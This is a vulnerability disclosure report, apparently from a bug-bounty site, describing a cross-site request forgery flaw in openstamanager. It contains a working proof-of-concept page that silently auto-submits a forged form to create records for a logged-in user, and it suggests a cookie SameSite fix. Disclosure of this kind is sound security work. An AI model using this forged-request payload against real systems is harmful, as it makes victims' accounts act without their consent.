Cross-Site Request Forgery (CSRF) in devcode-it/openstamanager
Valid
Reported on
Jul 31st 2021
✍️ Description
Attacker able to create any Document management if users visit attacker site.
🕵️♂️ Proof of Concept
1.Open the PoC.html In Firefox or safari.
2.now you can check Document management with aaa
name have been created.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/openstamanager/controller.php?id_module=60" method="POST">
<input type="hidden" name="id_module" value="60" />
<input type="hidden" name="id_plugin" value="" />
<input type="hidden" name="op" value="add" />
<input type="hidden" name="backto" value="record-edit" />
<input type="hidden" name="nome" value="aaa" />
<input type="hidden" name="idcategoria" value="2" />
<input type="hidden" name="data" value="" />
<input type="hidden" name="hash" value="#tab_0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability is capable of create any Document management.
Fix
Set SameSite attribute of cookies to Lax
or Strict
.
Occurrences
We have contacted a member of the
devcode-it/openstamanager
team and are waiting to hear back
2 years ago
to join this conversation